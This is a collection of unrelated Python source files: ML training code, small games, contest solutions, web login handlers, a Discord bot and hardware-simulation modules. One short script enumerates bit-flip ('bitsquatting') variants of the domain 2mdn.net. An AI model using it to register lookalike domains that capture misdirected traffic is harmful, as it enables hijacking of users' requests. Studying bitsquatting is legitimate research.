        BUG FIX: the original multiplied eps by std twice
        (``eps = eps.mul(std)`` then ``return eps.mul(std).add_(mu)``),
        effectively sampling with variance std**4 instead of std**2.
        """
        std = logvar.mul(0.5).exp_()
        eps = Variable(torch.FloatTensor(std.size()).normal_())
        return eps.mul(std).add_(mu)

    def sample_gumbel(self, size):
        """Draw Gumbel(0, 1) noise of the given size via -log(-log(U))."""
        eps = torch.FloatTensor(size).uniform_(0, 1)
        eps = eps.add_(1e-9).log().mul_(-1).add_(1e-9).log().mul_(-1)
        return Variable(eps)

    def reparametrize_gumbel(self, categorical, hard=False):
        """Gumbel-softmax relaxation of a categorical sample.

        With ``hard=True`` the forward value is one-hot while the
        straight-through trick keeps gradients flowing through the soft
        sample. Uses the module-level ``args.temperature``.
        """
        temperature = args.temperature
        noise = self.sample_gumbel(categorical.size())
        x = (categorical + noise) / temperature
        x = F.softmax(x)
        if hard:
            max_val, _ = torch.max(x, x.dim() - 1, keepdim=True)
            x_hard = x == max_val.expand_as(x)
            tmp = x_hard.float() - x
            tmp2 = tmp.clone()
            tmp2.detach_()  # straight-through: gradient bypasses the hard part
            x = tmp2 + x
        return x.view_as(categorical)

    def decode(self, z):
        """Map a latent vector to a 3x32x32 image with values in [0, 1]."""
        h3 = self.relu(self.fc3(z))
        h3 = h3.view(-1, 16*8, 4, 4)
        return self.fc4(h3)

    def sampleAndDecode(self, mu, logvar):
        """Sample z ~ q(z|x) and decode it; returns (recon, mu, logvar)."""
        z = self.reparametrize_normal(mu, logvar)
        return self.decode(z), mu, logvar

    def forward(self, x):
        mu, logvar = self.encode(x)
        return self.sampleAndDecode(mu, logvar)
# Instantiate the model and the reconstruction criterion used by loss_function.
model = VAE()
reconstruction_function = nn.MSELoss()
# reconstruction_function = nn.BCELoss()
# Sum (rather than average) per-element errors so the reconstruction term is
# on the same scale as the summed KL divergence.
reconstruction_function.size_average = False
def loss_function(recon_xs, x, mu, logvar):
    """VAE objective: summed reconstruction error plus KL divergence.

    recon_xs: list of reconstructions of ``x`` (one per latent sample drawn
    from q(z|x)); each contributes a reconstruction term via the module-level
    ``reconstruction_function`` (sum-reduced MSE).

    KL term — see Appendix B of Kingma & Welling, "Auto-Encoding Variational
    Bayes" (https://arxiv.org/abs/1312.6114):
        KLD = -0.5 * sum(1 + log(sigma^2) - mu^2 - sigma^2)

    (The commented-out categorical/Gumbel variant of this loss was removed.)
    """
    BCE = 0
    for recon_x in recon_xs:
        BCE += reconstruction_function(recon_x, x)
    KLD_element = mu.pow(2).add_(logvar.exp()).mul_(-1).add_(1).add_(logvar)
    KLD = torch.sum(KLD_element).mul_(-0.5)
    return BCE + KLD
# Adam over all model parameters.
optimizer = optim.Adam(model.parameters(), lr=1e-3)

def train(epoch):
    """Run one epoch of VAE training over the module-level ``train_loader``.

    Draws ``args.num_samples`` reconstructions from the same posterior
    (mu, logvar) and feeds them all to loss_function.
    """
    model.train()
    train_loss = 0
    for batch_idx, (data, _) in enumerate(train_loader):
        data = Variable(data)
        optimizer.zero_grad()
        total_batch = []
        # First sample comes from the full forward pass...
        recon_batch, mu, logvar = model(data)
        total_batch.append(recon_batch)
        # ...remaining samples reuse the same (mu, logvar).
        for _ in range(args.num_samples - 1):
            recon_batch, _, _ = model.sampleAndDecode(mu, logvar)
            total_batch.append(recon_batch)
        loss = loss_function(total_batch, data, mu, logvar)
        loss.backward()
        train_loss += loss.data[0]
        optimizer.step()
        if batch_idx % args.log_interval == 0:
            print('Train Epoch: {} [{}/{} ({:.0f}%)]\tLoss: {:.6f}'.format(
                epoch, batch_idx * len(data), len(train_loader.dataset),
                100. * batch_idx / len(train_loader),
                loss.data[0] / len(data)))
    print('====> Epoch: {} Average loss: {:.4f}'.format(
        epoch, train_loss / len(train_loader.dataset)))

# Commented-out machinery for sampling fixed latent z / one-hot c vectors:
# zs = []
# for _ in range(args.sample_size):
# z = torch.FloatTensor(1,model.z_size).normal_()
# z = Variable(z)
# zs.append(z)
# cs = []
# for i in range(10):
# c = np.zeros((1,10))
# c[0][i] = 1
# c = torch.from_numpy(c).type(torch.FloatTensor)
# c = Variable(c)
# cs.append(c)
def test(epoch):
    """Evaluate on the test set; every args.eval_interval epochs also dump a
    grid image of (input, reconstruction) pairs to args.save_image.

    :param epoch: 1-based epoch number
    """
    model.eval()
    test_loss = 0
    for batch_idx, (data, _) in enumerate(test_loader):
        # volatile=True is pre-0.4 PyTorch (today: torch.no_grad()).
        data = Variable(data, volatile=True)
        recon_batch, mu, logvar = model(data)
        # Dead debug branch: test_loss starts at 0 and only grows, so this
        # OpenCV preview never runs; flip the initial value to -1 to enable it.
        if test_loss == -1:
            a = recon_batch.data.numpy()
            cv.namedWindow('image', cv.WINDOW_NORMAL)
            cv.imshow('image', np.swapaxes(data.data.numpy()[0],0,2))
            cv.imshow('image', np.swapaxes(a[0],0,2))
            cv.waitKey(0)
            cv.destroyAllWindows()
        test_loss += loss_function([recon_batch], data, mu, logvar).data[0]
    test_loss /= len(test_loader.dataset)
    print('====> Test set loss: {:.4f}'.format(test_loss))
    if epoch % args.eval_interval == 0:
        imgs = []
        # for z in zs:
        # # for c in cs:
        #     model.eval()
        #     x = model.decode(z)
        #     imgFile = np.swapaxes((x.data).cpu().numpy()[0],0,2)
        #     print(imgFile.shape)
        #     imgs.append(imgFile)
        # for batch_idx, (data, _) in enumerate(test_loader2):
        #     data = Variable(data, volatile=True)
        #     mu, _ = model.encode(data)
        #     # print(batch_idx)
        #     img = model.decode(mu)
        #     img = np.swapaxes(np.swapaxes(img.data.numpy()[0], 0, 1), 1, 2)
        #     imgs.append(img)
        # imgFile = stack(imgs)
        # print(imgFile)
        # print(imgFile.shape)
        # imgFile = imgFile * 255 #/ np.max(imgFile)
        # imgFileName = args.save_image + "_" + str(epoch) + ".png"
        # cv.imwrite(imgFileName, imgFile)
        # Sample every 200th test batch: append the original image and its
        # reconstruction side by side (CHW -> HWC via the double swapaxes).
        for batch_idx, (data, _) in enumerate(test_loader2):
            if batch_idx % 200 != 0:
                continue
            img = np.swapaxes(np.swapaxes(data.numpy()[0], 0, 1), 1, 2)
            imgs.append(img)
            data = Variable(data, volatile=True)
            mu, _ = model.encode(data)
            # print(batch_idx)
            # a = torch.from_numpy(np.eye(10)[y_class.numpy()]).type(torch.FloatTensor)
            img = model.decode(mu)
            img = np.swapaxes(np.swapaxes(img.data.numpy()[0], 0, 1), 1, 2)
            imgs.append(img)
        imgFile = stack(imgs)
        imgFile = imgFile * 255 #/ np.max(imgFile)
        imgFileName = args.save_image + "_" + str(epoch) + ".png"
        cv.imwrite(imgFileName, imgFile)
def stack(ra):
    """Tile a list of equally-shaped images into a square grid.

    Uses the first floor(sqrt(len(ra)))**2 images, row-major; any
    remainder is silently dropped.
    """
    side = int(np.sqrt(len(ra)))
    rows = []
    for r in range(side):
        start = r * side
        rows.append(np.concatenate(ra[start:start + side], axis=1))
    return np.concatenate(rows, axis=0)
# Optionally resume from a saved model, then run the train/eval schedule.
if args.load_model:
    model = torch.load(args.load_model)
for epoch in range(1, args.epochs + 1):
    if "train" in args.mode:
        train(epoch)
    if "eval" in args.mode:
        test(epoch)
    if epoch % args.save_interval == 0:
        torch.save(model, args.save_model + "_" + str(epoch))
# Final save reuses the loop variable; if epochs is a multiple of
# save_interval this duplicates the last in-loop save.
torch.save(model, args.save_model + "_" + str(epoch))
|
# noinspection PyUnresolvedReferences
from .sub.subadmins.classbook import *
# noinspection PyUnresolvedReferences
from .sub.subadmins.homework import *
|
import zmq
import time
class ClientV1(object):
    """ZeroMQ REQ client: sends a fixed message every 2 seconds and prints
    the server's reply (Python 2)."""
    def run(self):
        # REQ sockets enforce strict send/recv lockstep with the server's REP socket.
        context = zmq.Context()
        socket = context.socket(zmq.REQ)
        socket.connect("tcp://localhost:18475")
        while True:
            print "Client version 1 is active..."
            socket.send("alpha...beta...gama")
            response = socket.recv()
            print "Response is {0}".format(response)
            time.sleep(2)
# Script entry point: run the client until interrupted.
if __name__ == "__main__":
    client = ClientV1()
    client.run()
# Python 2 contest solution: for each case read n, c, s and print the
# 1-based indices i*n^(c-1)+1 for i in [0, n).
t = int(raw_input())
def index(n,c,i):
    # Index of the i-th selected element in an n^c-sized space.
    return i*pow(n,c-1)+1
for i in range(1,t+1):
    m = map(int, raw_input().split(" "))
    n = m[0]
    c = m[1]
    s = m[2]  # read but unused by this solution
    str1 = "Case #"+str(i)+": "
    L = []
    # NOTE: this inner loop shadows the outer case counter i; harmless only
    # because str1 was already built and the outer for reassigns i next pass.
    for i in range(0,n):
        L.append(index(n,c,i))
    for x in L:
        str1+=str(x)
        str1+=" "
    print str1
# Code adapted from Corey Schafer's comprehensions tutorial.
nums = [1, 2, 3, 4, 5, 6, 7, 8, 9, 10]
# Rather than doing a for each loop and appending to the list, this is a comprehension
my_list = [n for n in nums]
print(my_list)
# For the same thing, but multiplying each value by itself:
my_list = [n*n for n in nums]
print(my_list)
# Using a map + lambda-> Doesn't read well at all. Use comprehensions
# my_list = map(lambda n: n*n, nums)
# print(my_list)
# This time: I want 'n' for each 'n' in nums if 'n' is even
my_list = [n for n in nums if n % 2 == 0]
print(my_list)
# I want a (letter, num) pair for each letter in 'abcd' and each number in '01234'
my_list = [(letter, num) for letter in 'abcd' for num in range(0, 4)]
print(my_list)
names = ['Bruce', 'Clark', 'Peter', 'Logan', 'Wade']
heroes = ['Batman', 'Superman', 'Spiderman', 'Wolverine', 'Deadpool']
# print(list(zip(names, heroes)))
# my_dict = {}
# for names, heroes in zip(names, heroes):
#     my_dict[names] = heroes
# print(my_dict)
# Dict comprehension: pair names with heroes, skipping Peter.
my_dict = {name: hero for name, hero in zip(names, heroes) if name != "Peter"}
print(my_dict)
# Remember: Sets have unique values
nums = [1,1,1,1,1, 2, 5, 7, 2, 9, 4, 8, 4]
my_set = set()
for n in nums:
    my_set.add(n)
print(my_set)
# Same result via a set comprehension.
my_set = {n for n in nums}
print(my_set)
# generator Expressions:
|
import nltk
from nltk.corpus import wordnet
#import lemma
def _similarity_pass(query_words, doc_words, f, sep1, sep2):
    """Accumulate Wu-Palmer similarity over every (query, document) word pair.

    Each scored pair is logged to *f* as "<query><sep1><word><sep2><score>".
    Pairs whose synset lookup fails, or whose similarity is undefined (None),
    are skipped.

    :return: (similarity_sum, scored_pair_count)
    """
    tot = 0
    count = 0
    for qw in query_words:
        for dw in doc_words:
            try:
                w1 = wordnet.synset(qw)
                w2 = wordnet.synset(dw)
            except Exception:
                # not a valid synset name (e.g. missing POS/sense suffix)
                continue
            sim = w1.wup_similarity(w2)
            if sim is None:
                # BUG FIX: wup_similarity() returns None when the synsets
                # share no common hypernym; the original code then raised
                # TypeError on "tot += None", which the bare except silently
                # swallowed AFTER already logging a "None" line.  Skip instead.
                continue
            f.write("\n" + qw + sep1 + dw + sep2 + str(sim))
            tot += sim
            count += 1
    return tot, count

def calculate(queryv,queryn,queryr,verb,noun,adverb):
    """Average Wu-Palmer similarity between query words and document words.

    :param queryv/queryn/queryr: query verbs / nouns / adverbs (synset names)
    :param verb/noun/adverb: document verbs / nouns / adverbs (synset names)
    :return: sum of pairwise similarities divided by (1 + scored pair count)

    All scored pairs and running totals are appended to 'semantic_data.txt'.
    """
    tot = 0
    count = 1  # starts at 1 so the final division can never be by zero
    with open('semantic_data.txt', 'a+') as f:
        # compare verbs of query and meta description
        t, c = _similarity_pass(queryv, verb, f, "\t\t\t", "\t\t\t\t")
        tot += t
        count += c
        f.write("\n"+str(tot)+"\n")
        # compare nouns of query and meta description
        t, c = _similarity_pass(queryn, noun, f, "\t", "\t\t")
        tot += t
        count += c
        f.write("\n"+str(tot) + "\n")
        # compare adverbs of query and meta description
        t, c = _similarity_pass(queryr, adverb, f, "\t", "\t\t")
        tot += t
        count += c
        f.write("\n"+str(tot) + "\n" + "Rel_value=" + str(tot/count))
    return tot/count
|
class ComponentNotInstalledError(Exception):
    """Raised when a framework component is not installed."""
    pass
class DirectoryNotFoundError(Exception):
    """Raised when a directory is expected but not found."""
    pass
class PackageNotInstalledError(Exception):
    """Raised when a package is expected but not installed."""
    pass
|
# Speed-guessing game: derive the true speed from distance D (km) covered in
# TM seconds, then award each round to whoever guessed closer (tie -> DRAW).
answers = []
for _ in range(int(input())):
    S, SG, FG, D, TM = map(int, input().strip(' ').split())
    actual_speed = S + (D * 180 / TM)
    sebi_err = abs(actual_speed - SG)
    father_err = abs(actual_speed - FG)
    if sebi_err < father_err:
        answers.append('SEBI')
    elif sebi_err > father_err:
        answers.append('FATHER')
    else:
        answers.append('DRAW')
for verdict in answers:
    print(verdict)
|
import os
import torch
import torch.nn as nn
from .gnmt import GNMT
from .nmt import NMTModel
from .seq2seq import Seq2Seq
from translators.logger import logger
def count_parameters(model, trainable: bool = True):
    """Count the parameters of *model* whose requires_grad flag equals *trainable*.

    :param model: any torch.nn.Module
    :param trainable: True counts trainable parameters, False counts frozen ones
    :return: total number of matching parameter elements
    """
    total = 0
    for param in model.parameters():
        if param.requires_grad == trainable:
            total += param.numel()
    return total
def save_checkpoint(cnf, model, optimizer, tokenizer, step):
    """Serialize model/optimizer/vocab state to <cnf.save_dir>/nmt_model_chkpt.pt.

    :param cnf: config object exposing save_dir
    :param model: the NMT model (optionally wrapped in nn.DataParallel)
    :param optimizer: optimizer to store alongside the weights
    :param tokenizer: provides vocab and feat_vocabs for later reloading
    :param step: training step recorded in the checkpoint
    """
    if not os.path.exists(cnf.save_dir):
        os.mkdir(cnf.save_dir)
    # Unwrap DataParallel so state_dict keys are not prefixed with "module.".
    nmtmodel = model.module if isinstance(model, nn.DataParallel) else model
    chkpt_file_path = os.path.join(cnf.save_dir, 'nmt_model_chkpt.pt')
    chkpt = {
        'step': step,
        'model': nmtmodel.state_dict(),
        # NOTE(review): the whole optimizer object is pickled here (not its
        # state_dict); load_chkpt returns it as-is - confirm this is intended.
        'optimizer': optimizer,
        'vocab': {"tokens": tokenizer.vocab,
                  "feats": tokenizer.feat_vocabs}
    }
    torch.save(chkpt, chkpt_file_path)
    logger.info(f'Best model was saved in {chkpt_file_path} !!!')
def load_chkpt(chkpt_file: str, optimizer=None, device: str = 'cuda'):
    """Load a checkpoint written by save_checkpoint.

    :param chkpt_file: path to the checkpoint file
    :param optimizer: if not None, it is replaced by the optimizer object
        stored in the checkpoint; if None, None is returned in its slot
    :param device: map_location passed to torch.load
    :return: (step, model_state_dict, optimizer_or_None, vocab)
    """
    # Typo fixed in the assert message ("is not exits" -> "does not exist").
    assert os.path.exists(chkpt_file), f'{chkpt_file} does not exist !!!'
    chkpt = torch.load(chkpt_file, map_location=device)
    # The original had two redundant "if optimizer is not None" branches that
    # returned identical values; collapsed into a single return.
    if optimizer is not None:
        optimizer = chkpt['optimizer']
    return chkpt['step'], chkpt['model'], optimizer, chkpt['vocab']
# Public API of this module.
# BUG FIX: the original list was missing a comma after 'Seq2Seq', so implicit
# string concatenation produced the bogus name 'Seq2Seqcount_parameters' and
# dropped both real names from the export list.  load_chkpt is also exported.
__all__ = ['NMTModel', 'GNMT', 'Seq2Seq',
           'count_parameters', 'save_checkpoint', 'load_chkpt']
|
import platform,os, sys, time,csv,contextlib
cPalabraIni=''
cLetraEntro=''
iLetraLargo=0
iIntenfalla=0
bloop=True
lst_Espacio=[]
lst_Entrada=[]
Lst_ImagenA= ['''
+---+
| |
|
|
|
|
=========''', '''
+---+
| |
O |
|
|
|
=========''', '''
+---+
| |
O |
| |
|
|
=========''', '''
+---+
| |
O |
/| |
|
|
=========''', '''
+---+
| |
O |
/|\ |
|
|
=========''', '''
+---+
| |
O |
/|\ |
/ |
|
=========''', '''
+---+
| |
O |
/|\ |
/ \ |
|
=========''']
def Clear():
    """Clear the terminal using the platform-appropriate shell command."""
    command = 'cls' if platform.system() == 'Windows' else 'clear'
    os.system(command)
def Print_Menu(cPalabraIni, lst_Espacio):
    """Clear the screen, show the current guess slots and the main menu."""
    Clear()
    Imprima_Espacios(lst_Espacio)
    header = 30 * "-"
    print(header, "AHORCADO", header)
    for option in ("1. Introducir Palabra ", "2. Jugar", "0. Salir"):
        print(option)
    print(68 * "-")
def Bienvenida():
    """Print the welcome banner and the rules of the game."""
    Clear()
    divider = 68 * "-"
    print(30 * "-", "AHORCADO", 30 * "-")
    print("Listo para un ahorcado?")
    print("Te explico brevemente las reglas:")
    print(divider)
    print("Este es un juego de 2 personas, si.. 2 personas.")
    print("La primera persona ingresa una palabra, y la segunda tiene que adivinar.")
    print("El resto es igual a cualquier otro ahorcado.")
    print(divider)
    print("---DIVIERTANSE---")
    time.sleep(0)  # no-op pause, kept for parity with the original
def Imprima_Espacios(lst_Espacio):
    # Show the current guess state, e.g. ['_', 'A', '_'].
    print(lst_Espacio)
def Captura(cPalabraIni,lst_Espacio):
    """Ask player 1 for the secret word; return it upper-cased plus one
    '_' display slot per letter (the slot list is mutated in place)."""
    cPalabraIni = input('Ingrese la palabra: ').upper()
    lst_Espacio.extend('_' * len(cPalabraIni))
    return (cPalabraIni, lst_Espacio)
def Jugar(cPalabraIni,lst_Entrada,lst_Espacio,iIntenfalla):
    """Play one guess: read a letter, reveal matches or advance the gallows.

    :param cPalabraIni: the secret word (upper case)
    :param lst_Entrada: letters entered so far (returned unchanged)
    :param lst_Espacio: per-letter display slots, updated in place
    :param iIntenfalla: failed-guess counter, incremented on a miss
    :return: (lst_Entrada, lst_Espacio, iIntenfalla)
    """
    cLetraEntro = input('Ingrese la Letra: ').upper()
    if len(cLetraEntro) != 1:
        print('Solo puede digitar una letra.')
    else:
        if cLetraEntro not in cPalabraIni:
            iIntenfalla = iIntenfalla + 1
            print(Lst_ImagenA[iIntenfalla])
        else:
            for j in range(len(cPalabraIni)):
                if cPalabraIni[j] == cLetraEntro:
                    lst_Espacio[j] = cLetraEntro
            # BUG FIX: the original compared the slot LIST against the word
            # STRING (lst_Espacio == cPalabraIni), which is never True, so a
            # win was never detected.  Join the slots before comparing.
            if ''.join(lst_Espacio) == cPalabraIni:
                print('Se acabo el juego! Ganaste')
                time.sleep(2)
    return (lst_Entrada,lst_Espacio,iIntenfalla)
# Main menu loop: 1 = player 1 enters the word, 2 = player 2 guesses a
# letter, 0 = quit.
iChoice = 0
Bienvenida()
cPalabraIni=''
cLetraEntro=''
while bloop:
    Print_Menu(cPalabraIni, lst_Espacio)
    print(Lst_ImagenA[iIntenfalla])
    iChoice = int(input('Enter su seleccion [0-2]: '))
    if iChoice == 1:
        cPalabraIni,lst_Espacio=Captura(cPalabraIni,lst_Espacio)
    elif iChoice == 2:
        # NOTE(review): there is no lose condition - once iIntenfalla exceeds
        # the last drawing, indexing Lst_ImagenA raises IndexError; confirm.
        lst_Entrada, lst_Espacio,iIntenfalla= Jugar(cPalabraIni,lst_Entrada,lst_Espacio,iIntenfalla)
        print(Lst_ImagenA[iIntenfalla])
    elif iChoice == 0:
        break
|
import binascii
# Generate "bitsquatting" variants of a domain: flip each single bit of its
# ASCII representation and print every variant that still decodes to text.
domain = "2mdn"
tld = ".net"
bin_repr = bin(int.from_bytes(domain.encode(), 'big'))
bin_repr = bin_repr[2:] #chop off '0b'
for index, bit in enumerate(bin_repr):
    # flip the bit at this position
    if bit == '1':
        bit = '0'
    else:
        bit = '1'
    new_bin_repr = bin_repr[:index] + bit + bin_repr[index + 1:]
    new_bin_repr = '0b' + new_bin_repr
    n = int(new_bin_repr, 2)
    try:
        new_domain = n.to_bytes((n.bit_length() + 7) // 8, 'big').decode()
        print(new_domain.lower() + tld)
    except:
        # the flipped byte sequence is not valid UTF-8 - skip this variant
        pass
|
#!/usr/bin/env python
import sys
def reverse_words(sentence):
    """Return *sentence* with its space-separated words in reverse order."""
    words = sentence.split(' ')
    words.reverse()
    return ' '.join(words)
def get_sentences(input_file):
    """Return an iterator over the non-empty lines of *input_file*."""
    with open(input_file, 'r') as handle:
        contents = handle.read()
    # filter(None, ...) drops exactly the empty strings, matching the
    # original lambda x: x != '' predicate for str elements.
    return filter(None, contents.split('\n'))
def reverse_sentences(input_file):
    """Reverse the word order of every sentence in *input_file*, one per line."""
    reversed_lines = map(reverse_words, get_sentences(input_file))
    return '\n'.join(reversed_lines)
# Usage: script.py <input_file>  (Python 2: print statement)
if __name__ == '__main__':
    print reverse_sentences(sys.argv[1])
|
from PRS import PRS_extract_phenotypes
import PRS_sumstats
full_bfile_path="/net/mraid08/export/jafar/Microbiome/Analyses/PNPChip/cleanData/PNP_autosomal_clean2_nodfukim"
#extract phenotypes IID Vs. Measured Phenotypes
df_pheno = PRS_extract_phenotypes.extract('s_stats_pheno') #Used for training set
#extract the predicted trait
trait = 'bmi'
# BUG FIX: the module is imported as "import PRS_sumstats", so the original
# "PRS.PRS_sumstats.*" calls raised NameError ("PRS" is never bound); call
# the module directly.
traits_dict = PRS_sumstats.get_traits_dict() #Dictionary with all Traits
assert (trait in traits_dict)
pheno_col = traits_dict[trait]
df_pheno_train = df_pheno[[pheno_col]] #Building Training set
train_index = df_pheno_train.index[:100] #use the first 100 individuals for training
df_prs = PRS_sumstats.compute_prs(df_pheno, bfile_path=full_bfile_path, train_indices=train_index, trait_name=trait)
df_prs.hist(bins=100)
print ("Finished")
# -----------------------------------------------------------
# Behave Step Definitions for Aries DIDComm File and MIME Types, RFC 0044:
# https://github.com/hyperledger/aries-rfcs/blob/main/features/0044-didcomm-file-and-mime-types/README.md
#
# -----------------------------------------------------------
from time import sleep
from behave import given, when, then
import json, time
from agent_backchannel_client import agent_backchannel_GET, agent_backchannel_POST, expected_agent_state, setup_already_connected
@given('"{agent}" is running with parameters "{parameters}"')
def step_impl(context, agent, parameters):
    """Start *agent* via its backchannel with the JSON-encoded *parameters*."""
    # Agent base URLs are supplied on the behave command line (-D <agent>=<url>).
    agent_url = context.config.userdata.get(agent)
    params_json = json.loads(parameters)
    data = {
        "parameters": params_json
    }
    (resp_status, resp_text) = agent_backchannel_POST(agent_url + "/agent/command/", "agent", operation="start", data=data)
    assert resp_status == 200, f'resp_status {resp_status} is not 200; {resp_text}'
@then('"{requester}" can\'t accept the invitation')
def step_impl(context, requester):
    """Negative step: receiving the invitation must fail with HTTP 500."""
    data = context.responder_invitation
    # Force a brand-new connection so an existing one can't mask the failure.
    data["use_existing_connection"] = False
    (resp_status, resp_text) = agent_backchannel_POST(context.requester_url + "/agent/command/", "out-of-band", operation="receive-invitation", data=data)
    assert resp_status == 500, f'agent command should fail but resp_status {resp_status} is not 500; {resp_text}'
|
import Handler,usersdb ,userfun
logged = {}
class Signup(Handler.Handler):
    """User registration: checks username/email uniqueness, hashes the
    password, sets the session cookie and stores the new user."""
    def get(self):
        self.render("signup_form.html")
    def post(self):
        username = self.request.get("username")
        email = self.request.get("email")
        password = self.request.get("password")
        conf = self.request.get("conf")  # confirmation password (not validated - TODO)
        error = " "
        if usersdb.Users.all().filter("username =", username).get():
            error = "This username is already taken"
        if usersdb.Users.all().filter("email =", email).get():
            error = error + " the email is already used"
        if error != " ":
            # BUG FIX: the original rendered error=user and username=user,
            # showing the datastore entity (or None) instead of the error
            # message and the username the visitor typed.
            self.render("signup_form.html", error=error, username=username, email=email)
        else:
            password = userfun.hashed(password)
            cookie = username + "|" + userfun.cookistr(username)
            self.response.headers.add_header('Set-Cookie', 'user=%s' % str(cookie))
            user1 = usersdb.Users(username=username, password=password, email=email)
            user1.put()
            logged[cookie] = user1
            self.redirect("/")
class Login(Handler.Handler):
    """Validates credentials against the datastore and sets the session cookie."""
    def get(self):
        self.render("signup_form.html")
    def post(self):
        username = self.request.get("username")
        password = self.request.get("password")
        user = usersdb.Users.all().filter("username =",username).get()
        if user:
            # Stored password format is "<hash>|<salt>"; re-hash the attempt
            # with the same salt and compare the full strings.
            passwordo = user.password
            salt = passwordo.split('|')[1]
            genpass = userfun.hashed(password , salt)
            if genpass == passwordo:
                cookie= username +"|"+userfun.cookistr(username)
                self.response.headers.add_header('Set-Cookie','user=%s'%str(cookie))
                logged[cookie] = user
                self.redirect('/')
            else :
                self.render("signup_form.html", error="password or username ain't correct")
        else :
            self.render("signup_form.html", error="password or username ain't correct")
class Logout(Handler.Handler):
    """Clears the session cookie and drops the server-side session entry."""
    def get(self):
        # NOTE(review): the original read self.response.headers['user'] - the
        # session cookie lives on the REQUEST; confirm against the framework.
        cookie = self.request.cookies.get('user')
        self.response.headers.add_header('Set-cookie', 'user=;')
        # BUG FIX: "logged.del('user')" was a SyntaxError (del is a keyword,
        # not a dict method); remove this session's entry if present.
        logged.pop(cookie, None)
        self.redirect('/')
|
import os
import discord
from discord.ext import commands, tasks
from dotenv import load_dotenv
import logging
import queue
import glob_vars
STATUS_MESSAGE = " frustrated screams.."  # shown as the bot's "listening to ..." activity
USERNAME = "Rolbert 🎲"  # display name applied on startup (best effort)
load_dotenv()  # pull DISCORD_TOKEN from a local .env file
TOKEN = os.getenv('DISCORD_TOKEN')
client = discord.Client()
@client.event
async def on_ready():
    """Connected callback: set presence and username, log joined guilds."""
    logging.info(f'{client.user} has connected to Discord!')
    await client.change_presence(activity=discord.Activity(type=discord.ActivityType.listening, name=STATUS_MESSAGE))
    try:
        await client.user.edit(username=USERNAME)
    except:
        # username edits are rate-limited by Discord; best-effort only
        print("couldnt change username")
    for guild in client.guilds:
        logging.info(guild)
@client.event #receive msg event callback -----------------------
async def on_message(message):
    # Ignore our own messages to avoid feedback loops.
    if message.author == client.user:
        return
    # Hand the message off to the rest of the app via the shared queue.
    glob_vars.send_bot_receive_queue(message)
@tasks.loop(seconds=0.05)
async def loop():
    """Background pump: drain glob_vars.send_queue and post each (channel,
    content) pair to Discord every 50 ms."""
    if glob_vars.terminate:
        exit() # not a clean way to exit!
    try:
        # non-blocking get so the event loop is never stalled
        send_item = glob_vars.send_queue.get(False)
        logging.info(send_item)
        channel, content = send_item
        await channel.send(content)
    except queue.Empty:
        send_item = None
def start_api():
    """Schedule the background sender task, then run the Discord client.

    BUG FIX: client.run() blocks until the client shuts down, so the
    original 'loop.start()' placed AFTER it was never reached and queued
    messages were never sent.  The task must be scheduled before entering
    the event loop; discord.py runs it once the loop starts.
    """
    loop.start()
    client.run(TOKEN)
|
import torch
from UnarySim.sw.stream.gen import RNG
from UnarySim.sw.stream.shuffle import SkewedSync, Bi2Uni, Uni2Bi
from UnarySim.sw.kernel.shiftreg import ShiftReg
from UnarySim.sw.kernel.abs import UnaryAbs
import math
class CORDIV_kernel(torch.nn.Module):
    """
    the kernel of the correlated division
    this kernel is for unipolar only
    dividend and divisor have to synchronized
    """
    def __init__(self,
                 depth=4,
                 rng="Sobol",
                 rng_dim=4,
                 stype=torch.float):
        super(CORDIV_kernel, self).__init__()
        self.depth = depth
        # shift register holding the last `depth` emitted quotient bits
        self.sr = ShiftReg(depth, stype)
        # random index source used to sample a historic quotient bit
        self.rng = RNG(int(math.log2(depth)), rng_dim, rng, torch.long)()
        self.idx = torch.nn.Parameter(torch.zeros(1).type(torch.float), requires_grad=False)
        self.stype = stype
        self.init = torch.nn.Parameter(torch.ones(1).type(torch.bool), requires_grad=False)
        self.historic_q = torch.nn.Parameter(torch.ones(1).type(stype), requires_grad=False)
    def forward(self, dividend, divisor):
        """One bit-stream step: emit the dividend bit when divisor==1,
        otherwise replay a randomly selected historic quotient bit."""
        # generate the random number to index the shift register
        # 1) generate based on divisor value, conditional probability
        # if self.init.item() is True:
        #     self.historic_q = torch.gather(self.sr.sr, 0, self.rng[self.idx.type(torch.long)%self.depth].type(torch.long))
        #     self.init.data.fill_(False)
        # else:
        #     self.historic_q = torch.gather(self.sr.sr, 0, torch.unsqueeze(self.rng[self.idx.type(torch.long)%self.depth].type(torch.long), 0))
        # divisor_eq_1 = torch.eq(divisor, 1).type(self.stype)
        # self.idx.data = self.idx.add(divisor_eq_1)
        # 2) always generating, no need to deal conditional probability
        divisor_eq_1 = torch.eq(divisor, 1).type(self.stype)
        self.historic_q.data = self.sr.sr[self.rng[self.idx.type(torch.long)%self.depth]]
        self.idx.data = self.idx.add(1)
        quotient = (divisor_eq_1 * dividend + (1 - divisor_eq_1) * self.historic_q).view(dividend.size())
        # shift register update
        # 1) update shift register based on whether divisor is valid
        dontcare1, dontcare2 = self.sr(quotient.type(self.stype), mask=divisor_eq_1)
        # 2) always update shift register
        # dontcare1, dontcare2 = self.sr(quotient.type(self.stype), mask=None)
        return quotient.type(self.stype)
class UnaryDiv(torch.nn.Module):
    """
    this module is for unary div, i.e., iscbdiv.

    In "bipolar" mode the signs are stripped, the magnitudes divided in
    unipolar domain, and the sign reapplied via XOR; otherwise the inputs
    are divided directly by the CORDIV kernel.
    """
    def __init__(self,
                 depth_abs=3,
                 depth_sync=2,
                 depth_kernel=2,
                 shiftreg_abs=False,
                 mode="bipolar",
                 rng="Sobol",
                 rng_dim=4,
                 btype=torch.float,
                 stype=torch.float):
        super(UnaryDiv, self).__init__()
        # data representation
        self.mode = mode
        self.stype = stype
        # BUG FIX: the original used `self.mode is "bipolar"` - `is` tests
        # object identity, not string equality, which is fragile (depends on
        # CPython string interning) and a SyntaxWarning since Python 3.8.
        if self.mode == "bipolar":
            self.abs_dividend = UnaryAbs(depth=depth_abs, shiftreg=shiftreg_abs, stype=stype, btype=btype)
            self.abs_divisor = UnaryAbs(depth=depth_abs, shiftreg=shiftreg_abs, stype=stype, btype=btype)
            self.bi2uni_dividend = Bi2Uni(stype=stype)
            self.bi2uni_divisor = Bi2Uni(stype=stype)
            self.uni2bi_quotient = Uni2Bi(stype=stype)
        self.ssync = SkewedSync(depth=depth_sync, stype=stype, btype=btype)
        self.cordiv_kernel = CORDIV_kernel(depth=depth_kernel, rng=rng, rng_dim=rng_dim, stype=stype)
    def bipolar_forward(self, dividend, divisor):
        # strip signs, divide magnitudes in unipolar domain, reapply sign
